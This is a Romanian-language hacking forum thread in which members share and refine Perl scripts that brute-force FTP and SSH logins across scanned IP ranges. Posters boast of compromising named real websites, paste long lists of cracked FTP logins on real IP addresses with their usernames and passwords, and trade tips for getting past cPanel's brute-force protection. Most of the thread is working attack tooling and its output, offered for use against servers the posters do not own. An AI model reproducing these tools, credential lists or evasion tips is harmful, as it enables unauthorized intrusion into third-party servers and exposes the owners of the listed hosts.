FTP brute PERL coded

[galford]

Cum functioneaza. Incearca brute la user/password (definite in fisierul pass_file) la toate hostname-urile dintr-un fisier (linie-dupa-linie, fisier implicit logfile) salvand intr-un fisier definit ip user password (ftp.log). Nu l-am facut multi-thread pentru ca sincer mi-a fost lene.

Sursa:

do

for ip in $(cat logfile)
do
        while read USR PAS
        do
                perl x.pl $ip $USR $PAS
        done < pass_file
done

x.pl

#!/usr/bin/perl

use Net::FTP;

my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2] || "";
my $port = "21";

$ftp=Net::FTP->new("$host", Port=>"$port", Timeout => 5)
or die("couldn't connect to host:" . $host . " on port " . $port);

if($ftp->login("$user","$pass")) {
 print "Login found: $host $user $pass\n";
 open (MYFILE, '>>ftp.log');
 print MYFILE "$host $user $pass\n";
 close (MYFILE);
}

$ftp->close();

Exemplu pass_file:

shop shop
sales sales
orders orders
shop password
shop 123456

Sa il faca cineva multithread-ing si sa-l posteze aici. Si sa mai adauge in cazul in care un ip din lista da timeout ... sa treaca la urmatorul ip nu sa stea sa incerce toate parolele.

Galford D. Weller - galford@inbox.com

Hostname owned cu acest tool:

www.atminformatica.com.br

movie.cluecian.com

mail.orgltd.com

toystory.overland.cl

Toate cu access la DocumentRoot.

Proof of concept:

root@admin [/dev/shm/ftpd]# cat logfile

toystory.overland.cl

root@admin [/dev/shm/ftpd]# ./do

Login found: toystory.overland.cl webmaster XXXX

root@admin [/dev/shm/ftpd]# cat ftp.log

toystory.overland.cl webmaster XXXX

Enjoy.

PS: Nu l-am facut eu de la 0. Ci doar am luat un perl script de pe google si am luat doar ceea ce-mi trebuie mie.

SURSA: http://www.perlmonks.org/bare/?displaytype=displaycode;node_id=352761

Edited November 11, 2011 by galford

[albastruu]

daca ar cineva un psw list cu parole romanesti si o poate posta?

[Flubber]

acesta nu este un exploit/poc ci un simplu `hack tool'. iar thread-ul a devenit o cerere din moment ce ai specificat urmatoarea cerinta

Sa il faca cineva multithread-ing si sa-l posteze aici. Si sa mai adauge  in cazul in care un ip din lista da timeout ... sa treaca la urmatorul  ip nu sa stea sa incerce toate parolele.

albastruu - thread-ul este din noiembrie 2011, deja a trecut un an, haha

[MadAgent]

Ia d'aci

cpan -install Net::FTP Parallel::ForkManager

ca sa-l faci sa mearga...

perl brute_ftp.pl

ia singur ip-uri din hosts si "user pass" din pass_file

#!/usr/bin/perl
#Copyright MadAgent 2012
use Net::FTP;
use Parallel::ForkManager;

my $pm=new Parallel::ForkManager(30);
my $port = "21";

open (HOSTS, 'hosts');
while (<HOSTS>) {
        $pm->start and next;
        chomp;
        $host=$_;
        $err=0;
        $ftp=Net::FTP->new($host, Port=>$port, Timeout=>5) or $err=1;
        exit if $err;
        open (PASSFILE, 'pass_file');
        while (<PASSFILE>) {
                chomp;
                ($user, $pass) = split(" ", $_);
                $err=0;
                $ftp->login($user,$pass) or $err=1;
                next if $err;
                print "Login found: $host $user $pass\n";
                open (MYFILE, '>>ftp.log');
                print MYFILE "$host $user $pass\n";
                close (MYFILE);
        }
        close (PASSFILE);
        $ftp->close;
        $pm->finish;
}
$pm->wait_all_children;
close (HOSTS);

Learn from it...

[icemerc]

$ perl brute_ftp.pl

Can't locate Parallel/ForkManager.pm in @INC (@INC contains: /usr/lib/perl5/site_perl/5.8.8/i386-linux-thread-multi /usr/lib/perl5/site_perl/5.8.8 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi /usr/lib/perl5/vendor_perl/5.8.8 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.8/i386-linux-thread-multi /usr/lib/perl5/5.8.8 .) at brute_ftp.pl line 4.

BEGIN failed--compilation aborted at brute_ftp.pl line 4.

vreo idee?

[hKr]

Scriptul necesita modulul "Parallel::ForkManager" iar pentru ca acesta lipseste, apare eroarea expusa mai sus.

Pentru instalarea modulului:

• wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.9.tar.gz
  
• tar -zxvf Parallel-ForkManager-0.7.9.tar.gz
  
• cd Parallel-ForkManager-0.7.9
  
• perl Makefile.PL
  
• make
  
• make test
  
• make install
  

Am testat scriptul si functioneaza.

In mai putin de 1 minut am avut ca rezultat 185 de conturi de ftp.

Rezultat:

Login found: 66.0.1.148 shop shop
Login found: 66.0.19.241 shop shop
Login found: 66.0.212.153 shop shop
Login found: 66.0.19.242 shop shop
Login found: 66.0.19.254 shop shop
Login found: 66.0.19.243 shop shop
Login found: 66.0.19.252 shop shop
Login found: 66.0.1.148 sales sales
Login found: 66.0.19.241 sales sales
Login found: 66.0.212.153 sales sales
Login found: 66.0.19.242 sales sales
Login found: 66.0.19.254 sales sales
Login found: 66.0.19.243 sales sales
Login found: 66.0.19.252 sales sales
Login found: 66.0.1.148 orders orders
Login found: 66.0.212.153 orders orders
Login found: 66.0.19.241 orders orders
Login found: 66.0.19.242 orders orders
Login found: 66.0.19.254 orders orders
Login found: 66.0.19.243 orders orders
Login found: 66.0.19.252 orders orders
Login found: 66.0.1.148 shop password
Login found: 66.0.212.153 shop password
Login found: 66.0.19.241 shop password
Login found: 66.0.19.242 shop password
Login found: 66.0.19.254 shop password
Login found: 66.0.19.243 shop password
Login found: 66.0.19.252 shop password
Login found: 66.0.1.148 shop 123456
Login found: 66.0.212.153 shop 123456
Login found: 66.0.19.241 shop 123456
Login found: 66.0.19.242 shop 123456
Login found: 66.0.19.254 shop 123456
Login found: 66.0.19.243 shop 123456
Login found: 66.0.19.252 shop 123456
Login found: 66.0.1.148 admin admin
Login found: 66.0.19.242 admin admin
Login found: 66.0.19.254 admin admin
Login found: 66.0.19.243 admin admin
Login found: 66.0.33.148 shop shop
Login found: 66.0.33.148 sales sales
Login found: 66.0.33.148 orders orders
Login found: 66.0.33.148 shop password
Login found: 66.0.33.148 shop 123456
Login found: 66.0.33.148 admin admin
Login found: 66.0.56.35 shop shop
Login found: 66.0.56.35 sales sales
Login found: 66.0.56.35 orders orders
Login found: 66.0.56.35 shop password
Login found: 66.0.56.35 shop 123456
Login found: 66.0.56.35 admin admin
Login found: 66.102.25.16 shop shop
Login found: 66.104.1.130 shop shop
Login found: 66.104.1.130 sales sales
Login found: 66.104.1.130 orders orders
Login found: 66.104.1.130 shop password
Login found: 66.104.1.130 shop 123456
Login found: 66.104.1.130 admin admin
Login found: 66.104.148.203 shop shop
Login found: 66.104.148.203 sales sales
Login found: 66.104.148.203 orders orders
Login found: 66.104.148.203 shop password
Login found: 66.104.148.203 shop 123456
Login found: 66.104.148.203 admin admin
Login found: 66.10.83.76 shop shop
Login found: 66.10.83.76 sales sales
Login found: 66.10.83.76 orders orders
Login found: 66.10.83.76 shop password
Login found: 66.10.83.76 shop 123456
Login found: 66.10.83.76 admin admin
Login found: 66.11.103.57 shop shop
Login found: 66.11.103.57 sales sales
Login found: 66.11.103.57 orders orders
Login found: 66.11.103.57 shop password
Login found: 66.11.103.57 shop 123456
Login found: 66.11.103.57 admin admin
Login found: 66.11.163.111 admin admin
Login found: 66.112.224.137 shop shop
Login found: 66.112.224.137 sales sales
Login found: 66.112.224.137 orders orders
Login found: 66.112.224.137 shop password
Login found: 66.112.224.137 shop 123456
Login found: 66.112.224.137 admin admin
Login found: 66.113.88.2 shop shop
Login found: 66.113.88.2 sales sales
Login found: 66.113.88.2 orders orders
Login found: 66.113.88.2 shop password
Login found: 66.113.88.2 shop 123456
Login found: 66.113.88.2 admin admin
Login found: 66.114.128.103 shop shop
Login found: 66.114.128.103 sales sales
Login found: 66.114.128.103 orders orders
Login found: 66.114.128.103 shop password
Login found: 66.114.128.103 shop 123456
Login found: 66.114.128.103 admin admin
Login found: 66.117.216.186 shop shop
Login found: 66.119.176.28 admin admin
Login found: 66.119.48.20 shop password
Login found: 66.119.48.20 shop 123456
Login found: 66.119.48.20 admin admin
Login found: 66.124.87.206 sales sales
Login found: 66.121.63.220 sales sales
Login found: 66.121.63.220 shop password
Login found: 66.121.63.220 admin admin
Login found: 66.128.118.28 shop shop
Login found: 66.128.118.28 sales sales
Login found: 66.128.118.28 orders orders
Login found: 66.128.118.28 shop password
Login found: 66.128.118.28 shop 123456
Login found: 66.128.118.28 admin admin
Login found: 66.130.49.120 shop shop
Login found: 66.130.49.120 sales sales
Login found: 66.130.49.120 orders orders
Login found: 66.130.98.157 shop shop
Login found: 66.130.98.157 sales sales
Login found: 66.130.49.120 shop password
Login found: 66.130.98.157 orders orders
Login found: 66.130.49.120 shop 123456
Login found: 66.130.98.157 shop password
Login found: 66.130.49.120 admin admin
Login found: 66.130.98.157 shop 123456
Login found: 66.130.98.157 admin admin
Login found: 66.132.0.10 shop password
Login found: 66.132.0.4 shop password
Login found: 66.132.0.10 shop 123456
Login found: 66.132.0.4 shop 123456
Login found: 66.132.0.10 admin admin
Login found: 66.132.0.4 admin admin
Login found: 66.132.0.11 shop password
Login found: 66.132.0.7 shop password
Login found: 66.132.0.11 shop 123456
Login found: 66.132.0.7 shop 123456
Login found: 66.132.0.11 admin admin
Login found: 66.132.0.7 admin admin
Login found: 66.132.0.8 shop password
Login found: 66.132.0.8 shop 123456
Login found: 66.132.0.9 shop password
Login found: 66.132.0.8 admin admin
Login found: 66.132.0.9 shop 123456
Login found: 66.132.0.9 admin admin
Login found: 66.132.230.71 shop password
Login found: 66.132.230.71 shop 123456
Login found: 66.132.230.71 admin admin
Login found: 66.134.106.69 shop shop
Login found: 66.134.106.69 sales sales
Login found: 66.134.106.69 orders orders
Login found: 66.134.106.69 shop password
Login found: 66.134.106.69 shop 123456
Login found: 66.134.106.69 admin admin
Login found: 66.134.14.29 shop shop
Login found: 66.134.14.29 sales sales
Login found: 66.134.14.29 orders orders
Login found: 66.134.14.29 shop password
Login found: 66.134.14.29 shop 123456
Login found: 66.134.14.29 admin admin
Login found: 66.134.195.194 shop shop
Login found: 66.134.195.194 sales sales
Login found: 66.134.195.194 orders orders
Login found: 66.134.195.194 shop password
Login found: 66.134.195.194 shop 123456
Login found: 66.134.195.194 admin admin
Login found: 66.134.222.33 admin admin
Login found: 66.137.60.27 shop password
Login found: 66.137.60.27 shop 123456
Login found: 66.137.60.27 admin admin
Login found: 66.142.5.110 shop shop
Login found: 66.142.5.110 sales sales
Login found: 66.142.5.110 orders orders
Login found: 66.142.5.110 shop password
Login found: 66.142.5.110 shop 123456
Login found: 66.142.5.110 admin admin
Login found: 66.143.210.38 shop shop
Login found: 66.143.33.155 shop shop
Login found: 66.143.210.38 sales sales
Login found: 66.143.33.155 sales sales
Login found: 66.143.210.38 orders orders
Login found: 66.143.33.155 orders orders
Login found: 66.143.210.38 shop password
Login found: 66.143.33.155 shop password
Login found: 66.144.135.184 shop shop
Login found: 66.144.135.230 shop shop
Login found: 66.143.210.38 shop 123456
Login found: 66.143.33.155 shop 123456
Login found: 66.143.210.38 admin admin
Login found: 66.143.33.155 admin admin

[MadAgent]

Merge cu cpan daca ai instalat... e mai usor:)

[galford]

Multumesc hKr pentru tips. O sa il testez maine si revin cu feedback.

LE: Testat si functioneaza ca uns.

Un tip pentru a scoate din lista de ip-uri C blocks.

awk -F. '!class[$1,$2,$3] { print $0; class[$1,$2,$3]=1; }' < lista_hosts > newfile

Edited January 27, 2012 by galford

[backdoor]

Ar trebuie facuta o mica modificare si anume sa nu testeze mai mult de 3 parole per ip intr-un interval mai scurt de 10 minute. Multe hosting-uri sunt bazate pe cPanel (care vin cu broute force protection : cPHulkD).

[bebemic]

se poate modifica daca gaseste un user/pass valid sa treaca la urmatorul ip?

[Cril]

se poate modifica daca gaseste un user/pass valid sa treaca la urmatorul ip?

in ftp_brute.pl

adaugi

$ftp->close;

dupa

close (MYFILE);

in mod normal ar trebui sa mearga:)

[bebemic]

mersi,o sa incerc

[Cril]

Npc.

aeriefoundation.org

u: ftp

p: ftp

//LE:

Login found: 62.149.34.4 ftp ftp

Login found: 62.149.34.11 ftp ftp

Login found: 62.149.34.12 ftp ftp

Login found: 62.149.34.13 ftp ftp

Login found: 62.149.34.15 ftp ftp

Login found: 62.149.34.16 ftp ftp

Login found: 62.149.34.10 ftp ftp

Edited February 19, 2012 by Cril

[backdoor]

Nu chiar cum a zis colegul Cril , ca o sa iti dea o eroare frumoasa in while

dupa

close (MYFILE);

in mod normal ar trebui sa mearga:)

De fapt trebuie sa iesi din bucla While , si asta o faci cu linia last; Off....

#!/usr/bin/perl

#Copyright MadAgent 2012

use Net::FTP;

use Parallel::ForkManager;

my $pm=new Parallel::ForkManager(30);

my $port = "21";

open (HOSTS, 'hosts');

while (<HOSTS>) {

$pm->start and next;

chomp;

$host=$_;

$err=0;

$ftp=Net::FTP->new($host, Port=>$port, Timeout=>5) or $err=1;

exit if $err;

open (PASSFILE, 'pass_file');

while (<PASSFILE>) {

chomp;

($user, $pass) = split(" ", $_);

$err=0;

$ftp->login($user,$pass) or $err=1;

next if $err;

print "Login found: $host $user $pass\n";

open (MYFILE, '>>ftp.log');

print MYFILE "$host $user $pass\n";

close (MYFILE);

last;

}

close (PASSFILE);

$ftp->close;

$pm->finish;

}

$pm->wait_all_children;

close (HOSTS);

[Cril]

Intradevar nu ma pricep la perl nici macar 1%, linia cu $ftp->close(); am luat-o urmarind comportamentul programului scris de MadAgent(parca). Am testat pe win xp / 32 biti / cu perl 5.10.0 instalat toate cele 3 metode si sincer, nu mi-a dat eroare la niciuna (am folosit host-uri "vulnerabile" postate de unul dintre utilizatori).

Intradevar e posibil sa fie o eroare de logica, e posibil ca "$ftp->close();" sa manance mai multe resurse decat "last;", dar programul functioneaza 100% corect.

Screen: http://cril.biz/ftp.jpg

Oricum merci pentru corectare, cu ocazia asta invat lucruri noi si... voi folosi si eu tot cu "last;".

Mici adaugari pt script (le putea face oricine):

fisier : ftp.pl

#!/usr/bin/perl
#Copyright MadAgent 2012
use Net::FTP;
use Parallel::ForkManager;

my $pm=new Parallel::ForkManager(30);
my $port = "21";
system ("perl gen.pl");

open (HOSTS, 'hosts.txt');
while (<HOSTS>) {
        $pm->start and next;
        chomp;
        $host=$_;
        $err=0;
        $ftp=Net::FTP->new($host, Port=>$port, Timeout=>5) or $err=1;
        exit if $err;
        open (PASSFILE, 'pass_file.txt');
        while (<PASSFILE>) {
                chomp;
                ($user, $pass) = split(" ", $_);
                $err=0;
                $ftp->login($user,$pass) or $err=1;
                next if $err;
                print "Login found: $host $user $pass\n";
                open (MYFILE, '>>ftp.log');
                print MYFILE "$host $user $pass\n";
                close (MYFILE);
                last;
        }
        close (PASSFILE);
        $ftp->close;
        $pm->finish;
}
$pm->wait_all_children;
close (HOSTS);

fisier: gen.pl

#!/usr/bin/perl

$fisier="hosts.txt";
unlink($fisier);
print "introduceti clasa pe care doriti sa o scanati.\n";
print "ex. : 200.30\n";
print "Clasa = ";
$clasa = <>;
print "Portiunea pe care vreti sa scanati - de ex: 203.30.imin.0-203.30.imax.255\n";
print "imin = ";
$imin = <>;
print "imax = ";
$imax = <>;
chomp($clasa);
chomp($imin);
chomp($imax);
for($i=$imin; $i<=$imax; $i++)
{
for($j=0; $j<256; $j++)
{
open(MYFILE, '>>hosts.txt');
print MYFILE "$clasa.$i.$j\n";
close(MYFILE);
}
}
close(MYFILE);

-> eu folosesc pass_file.txt & hosts.txt (cine vrea sa foloseasca fara extensie - trebuie doar sa scoata .txt din fisierele ftp.pl & gen.pl)

Ce face gen.pl : genereaza clasa (cu "portiunea" pe care vreti sa o scanati in hosts.txt).

Nu am dat minim/maxim pt $clasa, $imin si pt $imax pentru ca, banuiesc ca nu sunteti atat de dobotici incat sa dati clase inexistente.

Mod de executie : perl ftp.pl

PS: Orice critica/corectare e binevenita.

Edited February 9, 2012 by Cril

[bebemic]

    use strict;
    no warnings;
    use Net::SSH::Perl;
    use IO::Socket::INET;
    use threads;
    use threads::shared;

    #cmd to exec
    my $cmd = 'uname';
    #threads num
    my $thrnm = 1;
    #Connection timeout (sec)
    my $timeout = 5;


    #ip's
    my $ifile = './iplist.txt';
    #user list
    my $ufile = './users.txt';
    #pass list
    my $pfile = './passw.txt';
    #exec result list
    my $rfile = './res.txt';

    my @ilist : shared = loadf($ifile);
    my @ulist = loadf($ufile);
    my @plist = loadf($pfile);

    $| = 1;
    my @trl = ();

    $trl[$_] = threads->create(\&main) for 0..$thrnm - 1;
    $_->join for @trl;

    sub main
    {
    while(@ilist)
      {
       my $host = shift @ilist;
       my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerProto => 'tcp', PeerPort => 22, Timeout => $timeout);
       unless($sock)
        {
         print "No connection to $host:22\n";
         next;
        }
       for my $user(@ulist)
        {
         for my $pass(@plist)
          {
           my ($one, $two, undef) = ssh_it($host, $user, $pass, $cmd);
           if($one)
                    {
                     writef($rfile, "OK - $host:$user:$pass:$one\n");
                    }
           elsif($two)
                    {
                     writef($rfile, "Err - $host:$user:$pass:$two\n");
                    }
          }
        }
      }
    }

    sub ssh_it
    {
    my ($host, $user, $pass, $cmd) = @_;
    my $ssh = Net::SSH::Perl->new($host);
    #...
    eval
      {
       $ssh->login($user, $pass);
      };
     unless($@)
      {
       print "[+] $host:$user:$pass\n";
       my ($stdout, $stderr, undef) = $ssh->cmd($cmd);
       return ($stdout, $stderr);
      }
     else
      {
       print "[-] $host:$user:$pass\n";
      }
     return 0;
    }

    sub writef
    {
    open(F, '>>', $_[0]) || warn $_[0].' - '.$!."\n";
    print F $_[1];
    close F;
    }

    sub loadf
    {
    open(F, '<', $_[0]) || die $_[0].' - '.$!."\n";
    chomp(my @list = <F>);
    close F;
    return @list;
    } 

am gasit unu si pt ssh daca are careva nevoie

[gugustiuc]

am incercat acest script care imi e foarte util,dar din ce vad dupa 3 incercari la ip se opreste.nu se poate face sa faca un retry la conexiune si sa incerce urmatoarele parole din lista?

########################
root@localhost:/x/mar# ./ftpx2
Net::FTP>>> Net::FTP(2.77)
Net::FTP>>>   Exporter(5.64_03)
Net::FTP>>>   Net::Cmd(2.29)
Net::FTP>>>   IO::Socket::INET(1.31)
Net::FTP>>>     IO::Socket(1.32)
Net::FTP>>>       IO::Handle(1.31)
Net::FTP=GLOB(0x10e8370)<<< 220 Welcome to the XXX FTP service.
Net::FTP=GLOB(0x10e8370)>>> USER root
Net::FTP=GLOB(0x10e8370)<<< 331 Please specify the password.
Net::FTP=GLOB(0x10e8370)>>> PASS ....
Net::FTP=GLOB(0x10e8370)<<< 530 Login incorrect.
Incerc : 89.72.58.45 @#$%^&
Net::FTP=GLOB(0x10e8370)>>> USER root
Net::FTP=GLOB(0x10e8370)<<< 331 Please specify the password.
Net::FTP=GLOB(0x10e8370)>>> PASS ....
Net::FTP=GLOB(0x10e8370)<<< 530 Login incorrect.
Incerc : 89.72.58.45 Qwert
Net::FTP=GLOB(0x10e8370)>>> USER root
Net::FTP=GLOB(0x10e8370)<<< 331 Please specify the password.
Net::FTP=GLOB(0x10e8370)>>> PASS ....
Net::FTP=GLOB(0x10e8370)<<< 530 Login incorrect.
Incerc : 89.72.58.45 allo
Net::FTP=GLOB(0x10e8370)>>> USER root
Net::FTP: Unexpected EOF on command channel at ./ftpx2 line 22

#################

unde linia 22 e

next if $err;

#######################

eu am tot incercat dar imi prind urechile pe aici,am vazut ca mai e si Net::FTP::AutoReconnect

Orice ajutor e binevenit si scuze daca am redeschis un thread vechi

[gogosaru12345]

forula bruta (CXHY)n

[gugustiuc]

nu prea sunt expert in perl deci nu am inteles ultima postare.nici eu nici google.

[albastrel]

lol ))))))))) deci fac pe mine de ras!!! omg

nu prea sunt expert in perl deci nu am inteles ultima postare.nici eu nici google.